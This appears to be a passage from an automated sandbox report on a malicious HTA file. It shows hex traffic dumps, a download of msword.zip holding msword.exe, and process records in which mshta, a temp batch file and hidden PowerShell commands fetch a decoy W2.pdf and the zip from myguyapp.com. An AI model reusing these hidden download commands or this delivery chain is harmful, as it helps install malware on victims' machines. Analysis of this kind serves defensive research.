                                                                  Data Ascii: ^j$'y}%|W04vcY0$<j`:$7M\cf72~z+P!0S&fPB%>FetYW?~(nKwd|j7tK6cq5f8L,$%+gCJ8*#|H,RuPc!Bmx*(2J(H#)b1, (
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: a3 8e 7d eb a8 ab a3 ae 8e 7d eb d8 6f 0c af 63 a8 17 c3 fb 89 61 7f 49 9c a7 e3 7d e9 b8 af 3a de 87 de 98 87 eb 93 d8 4f 12 fb 49 26 76 7d 58 2e 94 ec 49 3b 5f 6a 3c 6b 5b 21 23 de 05 32 99 9d 94 6f f1 dd 90 9a 11 4f ad 49 71 c2 b7 a3 17 9c 62 b1 50 7c b1 31 f1 91 5c e0 09 39 2c b4 3f a9 8a 15 ff 60 71 b6 32 e5 64 db e4 6f a0 37 de 13 9d 99 16 8f 46 f9 da ca 15 2e b6 42 9b a6 15 85 83 40 69 c2 2e 65 5b e4 37 95 f7 58 d1 5c 76 a2 24 ce ee ce 6e b9 b0 27 cd a3 27 ed 52 b9 38 75 70 78 f6 42 ae 30 a9 5c b2 8b 85 68 4c ec 9c b4 92 2c 4e 43 92 b7 95 c4 6b 05 32 4a be 50 2e 7a 03 a7 e2 cd 99 71 2e c2 9c 19 d1 fd 14 8c 6c f9 0f 01 26 4d 39 9e 90 2a fc 2c cb d0 a2 f2 a4 fa 91 33 5e 12 ff fd e4 19 f5 bc 33 6b 17 ce ef f5 aa bd 9b ab 53 8e 5d 9e c2 a5 c9 cd c5 92
                                                                  Data Ascii: }}ocaI}:OI&v}X.I;_j<k[!#2oOIqbP|1\9,?`q2do7F.B@i.e[7X\v$n''R8upxB0\hL,NCk2JP.zq.l&M9*,3^3kS]
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: de 84 4f 26 a9 ed 13 86 69 72 d8 97 e0 14 74 90 fd 86 c5 c8 8f 26 38 05 3d 3d 95 0c 7b 54 5e 83 27 12 9c 02 9f 27 cf b0 57 df 19 92 9e e0 14 74 f7 cc 31 9c 64 e4 75 12 9c 82 2e 9e f5 86 93 55 5e 4d 9a 27 d8 f5 73 d8 70 8a 1b cb 5b a6 9f ea c6 92 ce 86 d3 8c fe 60 c3 19 ca 55 e5 52 93 7b 65 37 4f 09 18 6e 62 e4 6e dc 24 a4 9b b8 d7 68 8e f4 7a 74 05 99 6c 64 d8 6b 56 f6 b8 e1 24 e5 74 76 34 9c ac 9c 8c 37 0d bb a7 9c 8a 62 c3 a9 ca 95 39 d0 70 9a 91 4f 36 5c 49 b9 3a de 36 5c d9 c8 1d c3 19 ae 1f 8e 36 9c e9 3e 2d 1c 6f b8 aa d1 2f cb a7 9a d1 8f 1b ae 6e e2 de 69 b8 86 e1 a5 86 6b 1a fe dc 70 2d a3 ff 95 e1 da ee 5a f0 a2 e1 ba 26 ff 05 86 eb b9 79 e2 2f c3 f5 5d 7d b6 35 dc c0 f0 32 c3 8d 4c 6e 29 86 1b 1b ce 30 dc c4 f8 a9 61 b8 a9 e1 42 c3 cd cc da 6f
                                                                  Data Ascii: O&irt&8=={T^''Wt1du.U^M'sp[`UR{e7Onbn$hztldkV$tv47b9pO6\I:6\6>-o/nikp-Z&y/]}52Ln)0aBo
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: f0 12 04 5e 08 f8 50 43 3c e4 4e 89 78 e5 5a cf f0 82 bd 8e 32 aa 8c d9 8b 0c 68 ca b5 c9 cf 08 77 e3 7f 28 af fa d8 b6 ae 2a 7e df 7b 8e 9d 0f c7 df 1f 75 be 13 c7 76 12 27 76 fc 91 c6 69 9c 4f a7 ad 93 28 4e 93 ad 49 db 01 55 97 aa 28 9a 2a 31 21 b4 b5 f0 17 d0 0e b1 ad 44 da 34 09 50 41 4c da 86 d0 90 26 15 a6 8e 0e 21 3a 54 01 da 1f 5d d4 49 83 d1 22 51 09 ba 7f 26 84 ba 16 06 b5 f9 9d fb ee b3 5f ec b8 49 5b 9d 9c e7 f3 ee bb f7 9e 73 7e e7 dc df 8d aa 67 49 50 c5 36 21 be 18 17 d1 54 4b 61 f0 91 c1 a7 76 59 dc 1b 04 1f f4 17 fd f7 d9 a8 6f eb fd 37 6d 8f 01 93 f4 1b 77 ef 78 4f cf 58 b8 c9 e0 09 4f 87 47 1f b7 64 1a ba f7 ce 71 14 74 8e 1d 49 3d 75 56 92 42 c1 4c ac b5 2d 3e 1d 88 f7 cd 0f 77 8e 8f 04 26 a2 4d 7d b3 6b 23 23 27 e7 c3 2f bd a0 72 3f
                                                                  Data Ascii: ^PC<NxZ2hw(*~{uv'viO(NIU(*1!D4PAL&!:T]I"Q&_I[s~gIP6!TKavYo7mwxOXOGdqtI=uVBL->w&M}k##'/r?
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 28 34 32 3a 3e 71 d5 d6 f4 53 ff bd 5a cf ba 7d 07 26 a1 b3 13 42 1e 5a ae 26 df be c1 23 9f 9e 36 ff 0f 1f ec 3f 7e a1 e4 36 c7 a7 6f 3d 3a bb 3e 0c 65 fe 95 bb 16 1d 49 16 86 47 fb 0e 19 1d 9b a4 1c ce 2f 67 bd 41 4b e6 a1 f3 12 42 48 93 47 7a 0e 8a 9c 94 b8 7e ff 99 e2 06 0e 4f df 47 e8 b8 3a 71 88 f5 30 65 be e8 48 b2 31 05 8c 9c ba f2 40 01 eb 21 7e 60 35 3a 26 21 84 7c 9f 9b df d0 09 49 7f cf f9 4a db a7 ef 33 77 74 4e 7d 98 c1 7c 99 99 e8 48 72 f2 0e 9b fe 8f 4b cc c7 68 b6 13 1d 90 10 42 ee e7 39 f8 17 7f c9 d7 f0 e9 fb c2 07 9d 50 1f ba 96 b1 5e 26 d3 88 ce 24 ad ee 93 0f b3 5e a3 79 16 03 3a 1d 21 84 b4 a8 63 94 72 53 ab a7 af a6 37 3a 9d 4e 6c 60 bd 4c 7d 04 3a 92 c4 0c 31 36 d6 7b 7c a3 d0 1d 9d 8d 10 42 5a 13 96 a1 d1 d3 67 7f 02 1d 4d 27 c2
                                                                  Data Ascii: (42:>qSZ}&BZ&#6?~6o=:>eIG/gAKBHGz~OG:q0eH1@!~`5:&!|IJ3wtN}|HrKhB9P^&$^y:!crS7:Nl`L}:16{|BZgM'
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 5e 34 2b fd 19 77 30 6d 2d 6f 49 d3 88 29 b8 15 4c c1 ad a0 26 43 56 2f b5 75 ba cc 1d 5b 57 9f 74 e3 e8 cb 94 e0 87 f8 07 58 1e 4d b3 53 ff fd dc c9 b4 95 d9 8b a6 12 33 70 2b 98 82 5b 41 4d 86 ac 5e ee b0 84 3b b6 b6 2e 8e 61 29 cc 84 89 dc 2b e2 b4 94 68 a9 23 b9 83 e9 eb b2 b4 3f 3d f7 85 5b c1 14 dc 0a 6a 32 64 f5 72 87 0e 17 b8 73 eb 6b 9e 2f 4b 65 8d e5 9d c1 bd 20 4e e7 82 88 d6 fa 0f ee 64 fa aa fc ad 27 51 29 8d 85 5b c1 14 dc 0a 6a 32 64 f5 72 a7 e9 dc b9 35 b6 b9 35 4f 67 8d 13 5f c1 bd 1f 56 c9 44 6b 8d 2a e2 4e a6 31 23 80 a8 95 46 c2 ad 60 0a 6e 05 35 19 b2 7a b9 53 40 0e 77 70 8d ed eb c4 53 5a a3 ac e4 de 0e af 4c 6f a2 bd ce e5 4e a6 b3 7f f2 1e 0b b8 15 4c c1 ad a0 26 43 56 2f 77 f9 de c3 fd ef a7 35 a7 7b 33 b5 d6 b0 d0 4b dc cb e1 55
                                                                  Data Ascii: ^4+w0m-oI)L&CV/u[WtXMS3p+[AM^;.a)+h#?=[j2drsk/Ke Nd'Q)[j2dr55Og_VDk*N1#F`n5zS@wpSZLoNL&CV/w5{3KU
                                                                  2025-01-07 17:13:00 UTC16384INData Raw: 0b 1b d6 19 55 e7 74 6c c9 71 49 89 c3 12 6a 24 da 69 aa 34 d6 b4 d6 f9 d5 15 53 34 4c c4 c6 13 13 84 c4 e5 31 30 e5 62 71 7f 83 f2 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 69 2e c0 5f 3e dd 8b ef bf ea 79 85 65 b4 6f ce 3e cb f8 13 fa da d1 3c 6d af ee ed a7 ef cf eb 3a 1d c2 6e d9 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 66 de cf df 3f 2d b7 ef 8f ea 09 64 9b b7 9f ce 42 d7 f8 0b fa c6 cd 43 6d 4f ee 95 9f ef ff 00 eb 4a dd 3a 61 1a e0 00 00 00 00 00 00 00 00 00 34 97 60 2f 9f 6e c7 f7 db f5 3c c2 b2 da 37 e7 1f 65 fc 0b fd 6d 68 9d f6 d7 f7 76 d3 f7 e7 f5 95 0e e1 37 6c 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 33 73 67 ff 00 9f 96 db f7 c7 f5
                                                                  Data Ascii: UtlqIj$i4S4L10bqi._>yeo><m:n f?-dBCmOJ:a4`/n<7emhv7l3sg


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449738193.26.115.394437420C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2025-01-07 17:13:04 UTC167OUTGET /msword.zip HTTP/1.1
                                                                  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                  Host: myguyapp.com
                                                                  Connection: Keep-Alive
                                                                  2025-01-07 17:13:04 UTC285INHTTP/1.1 200 OK
                                                                  Date: Tue, 07 Jan 2025 17:13:04 GMT
                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                  Last-Modified: Tue, 07 Jan 2025 15:01:14 GMT
                                                                  ETag: "13bf90-62b1f043130f4"
                                                                  Accept-Ranges: bytes
                                                                  Content-Length: 1294224
                                                                  Connection: close
                                                                  Content-Type: application/zip
                                                                  2025-01-07 17:13:04 UTC7907INData Raw: 50 4b 03 04 14 00 00 00 08 00 f2 25 27 5a 24 96 56 05 1a bf 13 00 0f 46 14 00 0a 00 00 00 6d 73 77 6f 72 64 2e 65 78 65 ec bd 7f 7c 54 c5 b9 3f 7e f6 47 c2 92 6c d8 45 12 0c 1a 34 42 50 94 1f 8d 2e 28 71 41 17 c8 09 d1 b2 b8 b8 66 17 94 00 2a c4 c3 16 81 92 73 f8 d1 12 4d 38 49 65 3d ac b5 d6 de 6a 6b 6f 4d b1 ad 6d 6d a5 ad 95 a8 88 09 20 09 4a 2d 0a c5 b4 e0 35 22 d5 59 37 ea 2a 31 2c 10 39 9f f7 33 b3 1b 02 d7 b6 f7 f3 79 dd ef 7f df e0 ec 99 33 e7 99 99 67 9e 79 7e ce cc 39 fa 6f 7f 58 b2 49 92 64 47 32 4d 49 6a 91 c4 9f 4f fa f7 7f fb 91 86 5c fa e2 10 e9 b9 c1 7f be ac c5 32 fb cf 97 dd a6 2c ab 2d 5e b5 7a e5 3d ab ef bc b7 f8 ee 3b 57 ac 58 a9 16 df b5 b4 78 b5 b6 a2 78 d9 8a e2 f2 5b 82 c5 f7 ae 5c b2 74 62 5e 5e 4e 49 ba 8d e9 df 7e f3 1b 59 17
                                                                  Data Ascii: PK%'Z$VFmsword.exe|T?~GlE4BP.(qAf*sM8Ie=jkoMmm J-5"Y7*1,93y3gy~9oXIdG2MIjO\2,-^z=;WXxx[\tb^^NI~Y
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: c2 ec e9 51 84 5e e2 42 8c b3 88 8f f3 7b 5f 66 b0 1f a4 7f 62 f5 9e a8 fd 07 4d 33 29 2a ef 89 d5 2b 78 bc 4d 8e 3a fb 70 3c 5f 31 bf 3a 8d f0 dd 63 68 f3 99 1f 17 99 87 2c 58 c2 ad e7 3d 43 6a 90 7d e3 12 f2 2d d0 77 11 bb 18 c3 62 9b d0 83 59 b0 1b b3 54 06 28 57 e3 c7 84 2d 6d fe 71 3c 7f 7f 19 c5 1b 66 c1 53 34 36 07 1f db 68 34 28 f4 63 30 b3 2b ab be 50 15 14 72 12 14 c7 52 6a ca 26 10 1e 5a 6e 1a 9f 03 25 12 b5 57 24 4e 06 bc 5a 42 67 31 88 c3 1c ab 70 fb 3c 6e 23 17 2d da c1 a0 7f f8 19 43 73 6b 31 29 61 f6 f8 78 71 ee a3 41 e0 a6 de 18 b1 84 14 52 ec 66 c1 93 f5 bc df 09 55 21 76 a8 54 ca 54 2b e1 d5 ee a2 6a ec 3f 30 51 de 57 d5 dc b4 24 11 09 6a cc 2c ea f0 16 ed f1 aa 20 fb 29 aa c5 cf 80 39 ca 26 d0 2a a6 fa ed 88 8d 5d 0a ce 8e d8 8d 4e 36
                                                                  Data Ascii: Q^B{_fbM3)*+xM:p<_1:ch,X=Cj}-wbYT(W-mq<fS46h4(c0+PrRj&Zn%W$NZBg1p<n#-Csk1)axqARfU!vTT+j?0QW$j, )9&*]N6
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 3f d4 f2 38 a0 5a 6d 04 eb be 0e 21 e9 a1 60 47 1e a4 2f 6f 8e 71 79 fb 89 d6 7e bf d1 dc fe f2 58 94 58 db a8 be f8 15 8b 75 41 5e 5e a1 cd 91 f9 4a 14 eb 0d d9 cd f4 ad 48 1e cd d0 cb e5 83 e9 69 2c d2 b1 8b 23 ca af 5b fa df f6 36 92 76 a2 1b 46 f9 9f 38 ec de 7f a2 f3 fd 6b ff 25 76 ff 64 09 e9 1d 9d 41 52 21 8a 85 fb 7d e7 ef 9b 1b bd b1 cb 15 23 34 43 9f 8a 5d 98 89 ed 6d 85 be 13 a9 12 72 5c 1e ac ab 62 a4 34 a4 3c 59 38 7a a8 e5 0c 53 19 c1 2f 68 ae 79 b6 f4 e8 fc 72 59 fd 76 25 ff 1e f6 f8 7c 52 04 2f e9 ca c1 db 73 af 74 7d fc 1f c9 6d 6d 83 42 c5 34 80 a2 f1 a3 5a 1e 3f 76 d3 19 7c 76 76 f0 69 eb f3 60 b4 a3 ea cf 6f 6b 1f 05 d3 0d 89 a2 27 49 57 2e 3c 6c dd 8d cb 59 7e 9c ac 76 6c 0b d6 56 7b f4 fd 7a f9 52 77 b1 a6 fd 62 59 aa a4 b8 a0 b8 e7
                                                                  Data Ascii: ?8Zm!`G/oqy~XXuA^^JHi,#[6vF8k%vdAR!}#4C]mr\b4<Y8zS/hyrYv%|R/st}mmB4Z?v|vvi`ok'IW.<lY~vlV{zRwbY
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 16 e2 7e b2 2d a0 05 6e 8e b9 01 97 9d 55 09 8d 8a 1f 66 ea b9 06 36 9d 3e 86 2a 6f db 64 55 5c aa 6d 21 70 cd c9 fb 72 40 30 c3 b5 c8 b1 fd 8f 02 5b a3 7b 70 1d f2 b8 8a ec c9 39 0c 41 dd 2d f6 c9 83 b0 e6 e3 1b 4e 8b e8 3f ca a0 c7 e1 30 73 ec 65 47 eb df d2 16 a9 60 71 df ee c8 c8 e7 a0 f8 b4 79 c8 b3 33 fc 62 de c1 af c3 f0 56 b2 c2 de 7e 6e a8 c0 4d 9c 60 16 47 f8 f1 b7 f4 41 0e 0d fa 8f f1 f1 51 7b 13 0e e1 5d 74 6f e0 d0 f3 c4 7c ff 26 41 28 6a 7b a4 c8 bd 8b c2 6b 52 7d e8 28 74 dc 7e ca 94 13 d6 17 f3 cf f6 ef 09 e1 65 fa 72 d9 6b 88 47 eb 39 2a 65 df 2c 9c 1c d3 9a fb e5 bf b4 7e cd 9c 10 22 35 71 43 85 5a d2 e4 e3 5b b2 74 34 08 04 6c a6 92 fd de 00 0b 21 db 31 48 cb bc 74 e0 90 2c 93 96 c4 54 8c 29 ec 34 74 e8 96 9a 84 7e 74 07 d6 cf ec 19 42
                                                                  Data Ascii: ~-nUf6>*odU\m!pr@0[{p9A-N?0seG`qy3bV~nM`GAQ{]to|&A(j{kR}(t~erkG9*e,~"5qCZ[t4l!1Ht,T)4t~tB
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: f1 2e 8c 0d 82 3e 51 6b 3f 7d 0a bf 96 df 18 79 50 77 0c 55 c3 73 92 7b 42 7a 2d a2 6d fa 79 56 5c c9 a7 c6 de 52 51 bd da b9 b1 d2 97 8a fc 2d 2d b2 1c 43 d7 42 59 93 35 63 bf f0 fe 8c 14 7b 69 a5 b1 8e b7 e9 c8 c8 e0 c7 24 e3 e4 be 77 e9 0e f7 f1 2f 74 21 4f 8d ed 5f b8 b3 99 81 73 ae cb 3f 7f f4 fd 82 b0 af dd 8f 1d 8e 1d a9 85 9a eb b7 39 ac 64 1e 90 0f 9e 90 7b f1 49 87 74 df bc c6 37 6c 95 83 85 94 9c cc 7a 7d be a9 94 f5 76 d3 96 df fc d0 79 26 bd 24 36 92 5c b5 e2 97 eb 8c bc 1c f3 5d 9d 44 66 92 f0 29 79 93 25 76 e5 24 a5 c6 fc d5 85 0f 06 6d b9 a8 8f b6 6f 9f be 94 e4 e6 7b 25 c6 6d 19 73 24 82 6f 8e c5 12 cb 4b 56 ad 4a b0 b9 7d 57 43 57 67 e9 f5 e7 c2 a2 53 8c bf 42 02 69 5a 45 31 ba fa 22 2a f1 71 b7 26 27 43 de bf e1 70 bc 42 37 fd ea e0 52
                                                                  Data Ascii: .>Qk?}yPwUs{Bz-myV\RQ--CBY5c{i$w/t!O_s?9d{It7lz}vy&$6\]Df)y%v$mo{%ms$oKVJ}WCWgSBiZE1"*q&'CpB7R
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 0c b8 8d 75 14 bd 50 7e 58 d6 dc 97 68 f7 f4 46 69 48 21 55 31 c7 d8 1f 42 e5 b5 c7 71 9d 8d f4 c6 ae d9 8d 36 aa ab 07 62 da a0 f0 24 95 e1 74 e0 c7 fc 90 f0 cd cf 5b f7 1e 32 aa 4c 1b eb 79 83 92 7b 17 41 77 3c 30 62 54 ed 59 11 ba e7 c8 27 e5 ac a1 e8 04 d9 2b ca 6a ef 78 41 71 ea e0 cf 5e 23 1c f5 d2 18 0e 2c ac 80 1e ca 20 fc e2 47 95 b0 1a c6 bf 2a f4 d5 8e 8a 8e a3 3b 28 19 a4 ae 7a 94 98 d2 cf 62 b3 2d 91 18 9a 3f 16 03 7a 83 60 46 bb d3 ab 1e 80 5b 86 d6 ef 0b c4 e3 2a f1 49 fd 50 8e 54 71 6f 00 89 d7 d9 b2 b5 ad f5 6f 7d 3d cd 8c dd 16 50 7a 1e 92 36 85 d3 0d 46 09 e6 68 88 20 d5 1c 7b 60 66 d5 f7 a8 1a f7 9b 5b 90 5f cb 5b 8f 19 b1 fa fa a8 4f aa 4c a9 ca 3e f4 d7 c9 2a 75 66 c7 fb e9 90 4a 24 54 7a db 4c 22 3c 6a fb b4 35 28 71 63 63 1c 7b 17
                                                                  Data Ascii: uP~XhFiH!U1Bq6b$t[2Ly{Aw<0bTY'+jxAq^#, G*;(zb-?z`F[*IPTqoo}=Pz6Fh {`f[_[OL>*ufJ$TzL"<j5(qcc{
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: c8 f1 b1 16 b6 04 a4 9e 4d 26 a1 a6 41 cc 6b 47 10 07 aa 89 28 4d ff 38 8e 7c e8 77 d3 4b 50 cf e0 20 d5 7a 2b 2c b9 9d 05 2b b3 9a 79 61 eb 9e fb 0e ef 33 c2 c3 9e a0 bb d8 ba 7c 6d db 22 1f f6 c8 3c 15 bc 9d ae 24 5c 02 92 5a 0f 1e 2d 74 52 b4 fd 1f 71 b8 db 44 89 31 a9 65 1d 0f b7 c7 88 d6 69 6b 96 91 8c c9 1a b1 9b b5 38 b2 1f 78 8c ad fe 61 45 5f d0 5b b8 9f 54 e6 4a 26 e8 b9 0d 0d 2b 61 11 44 07 a0 d9 02 fa 71 e4 21 1c b9 2a f0 a3 f3 f2 cd 71 48 df 2c 87 f6 cc 3e f9 4b 09 63 c3 66 d1 0b b2 27 fd 52 95 90 ff 5b 9f 24 eb b3 f7 22 3c 52 af 26 de 86 1f 3f 43 de 4e d5 cf 47 fe b3 f2 95 bd 4a a6 45 01 96 01 a3 9f 5c c5 9a cc f4 43 71 95 9e 0c 43 e3 db 41 b0 e7 ad d4 42 62 8a 16 43 a6 44 dd 17 71 1f 0a 37 22 fa 01 61 35 cb 70 ae 17 14 4b 3a fb fa 9f f1 ed
                                                                  Data Ascii: M&AkG(M8|wKP z+,+ya3|m"<$\Z-tRqD1eik8xaE_[TJ&+aDq!*qH,>Kcf'R[$"<R&?CNGJE\CqCABbCDq7"a5pK:
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: fc ba 41 17 27 71 f4 cc 50 ba 65 43 a0 ff f4 7a 06 9b ea 11 26 98 d9 5d c1 a5 5e c4 1f 46 6a af 21 3d 11 7b 15 05 55 cc bf 18 81 a0 85 6f a6 c8 5d 2b ae 35 5a 23 5b 0c 8a bc c1 6c 42 ce ba 26 89 94 bc 15 53 c2 d7 20 b2 ca b9 af 7a 8e d0 9a 2e 0f b2 67 f7 92 cb 67 72 f3 6a 02 6a 77 7b 0c df 29 1b a0 bd cb 6b 7f d3 0a 4d 9c d4 c9 7b 85 38 b4 95 f5 da 5c bf 83 48 2d 29 62 66 2d 7b 87 70 4d 89 f5 cf d7 15 e5 2c e7 87 05 f8 f4 d6 bf 80 f3 7e 61 60 ae 7b 55 68 8f d8 ae 43 eb 3f e7 68 c4 7a cb 50 61 19 18 90 25 8e 47 72 f4 78 10 2c 7d 94 28 95 0e 9b 65 db c9 eb 6b 11 31 1b 22 03 e0 20 a1 6b 16 a8 3b af bd 39 5f 42 0e 76 f4 3b 82 bc ec 65 66 d9 58 10 41 dc ff b3 35 50 44 6e 22 6f 74 ad 51 c2 bd 14 19 57 ec 49 e0 fc 9c 88 7f 50 cb 63 5f a3 53 8e 27 0b a3 3a 32 84
                                                                  Data Ascii: A'qPeCz&]^Fj!={Uo]+5Z#[lB&S z.ggrjjw{)kM{8\H-)bf-{pM,~a`{UhC?hzPa%Grx,}(ek1" k;9_Bv;efXA5PDn"otQWIPc_S':2
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: 98 31 45 a7 17 35 46 86 c2 eb 5d 87 0c a0 ab 62 2f 77 24 07 ed 5e f5 23 bd 32 42 ae be df 26 49 23 ef 41 28 32 0b 80 59 4a 24 87 32 0b bc 81 2a 5e 7a 92 7c 02 27 f0 57 10 84 8c 04 65 18 d4 34 2c 99 da 67 b7 90 5e 83 0d 11 e9 dc 97 6b b5 da 43 7c 38 d5 cd 72 b2 b1 bd 62 22 bb 04 5b c5 a9 62 10 39 ef 69 ab 7d b1 49 47 58 8c e7 7f 0f 3a 02 52 30 6a 10 8e fa 36 3d 12 3b 1b 10 a1 fe 8e 1b 6f 58 f0 59 68 0a 8b b1 33 8f 4f 5f bd 5c f5 7c 88 55 8f 75 da 77 d2 8e 9d 03 f9 af 59 7d ff ca 52 5b cd 84 41 72 19 71 05 2a 63 db c1 9b f1 b3 64 f2 c7 18 75 4d f3 3a 1d d9 5a 34 8a af bc 79 da 4a d6 38 cb a7 eb c2 5c bd a8 1c b2 7a 47 1f 53 09 d2 b8 ae 81 0f db 5c ca 59 4f eb 1c 1f 91 33 e6 11 47 37 82 7e 04 b4 c3 36 03 c4 10 93 cb be bd 8a 89 2d 21 1e 00 ed c5 8a 45 e0 4f
                                                                  Data Ascii: 1E5F]b/w$^#2B&I#A(2YJ$2*^z|'We4,g^kC|8rb"[b9i}IGX:R0j6=;oXYh3O_\|UuwY}R[Arq*cduM:Z4yJ8\zGS\YO3G7~6-!EO
                                                                  2025-01-07 17:13:04 UTC16384INData Raw: d9 05 a6 75 a8 5f f6 e4 fc 3a 3e 66 e7 6e ed cd 7e 08 7f 67 fc 69 38 95 a7 b3 c3 f6 10 10 9c 5c c4 53 df 65 c9 a7 7f 3d ff 56 1a 38 f0 43 f2 9a 49 21 fc b6 0e b5 fb 70 10 a0 0d 94 7a 73 cf a6 f9 1e b7 1a d4 60 8b 25 b6 84 c4 d1 46 dd 60 05 70 d0 22 d8 16 4f aa 86 ed 3a 79 cb 50 d7 7b c6 ac 42 e8 d9 1c b0 97 8a a8 b9 31 aa 55 4b 6b 02 0d 24 45 c2 4e e0 4c 2f b6 7b 33 20 db 91 13 74 e8 97 78 85 40 6a 79 ba ea 7f 35 16 15 68 d5 c9 55 c9 6d 5f de 2a 0a 3a 7b e5 08 d6 e8 8a 17 3c 57 9a 85 66 20 51 e9 00 40 4b 82 45 9e a0 d4 5c 8f 1c ff 1d a1 9e 03 1f a2 92 5d cf e3 7b d5 a3 f2 e2 27 9c 9b 3a 5e cd f7 84 d0 d3 f8 1c 54 a2 5e 1f 96 14 3c 50 5a f3 2d 13 da bb e6 92 61 af e5 f0 65 96 dd be 60 93 cb 58 05 d1 13 08 b2 cb 7c 9b 1f 41 eb c0 62 3e fe 38 77 bf ba 97 10
                                                                  Data Ascii: u_:>fn~gi8\Se=V8CI!pzs`%F`p"O:yP{B1UKk$ENL/{3 tx@jy5hUm_*:{<Wf Q@KE\]{':^T^<PZ-ae`X|Ab>8w


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:12:12:54
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\c2.hta"
                                                                  Imagebase:0x910000
                                                                  File size:13'312 bytes
                                                                  MD5 hash:06B02D5C097C7DB1F109749C45F3F505
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat"
                                                                  Imagebase:0x240000
                                                                  File size:236'544 bytes
                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff7699e0000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:4
                                                                  Start time:12:12:57
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:5
                                                                  Start time:12:13:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf"
                                                                  Imagebase:0x7ff6bc1b0000
                                                                  File size:5'641'176 bytes
                                                                  MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:6
                                                                  Start time:12:13:00
                                                                  Start date:07/01/2025
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip"
                                                                  Imagebase:0xa80000
                                                                  File size:433'152 bytes
                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:12:13:01
                                                                  Start date:07/01/2025
                                                                  Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                  Imagebase:0x7ff74bb60000
                                                                  File size:3'581'912 bytes
                                                                  MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
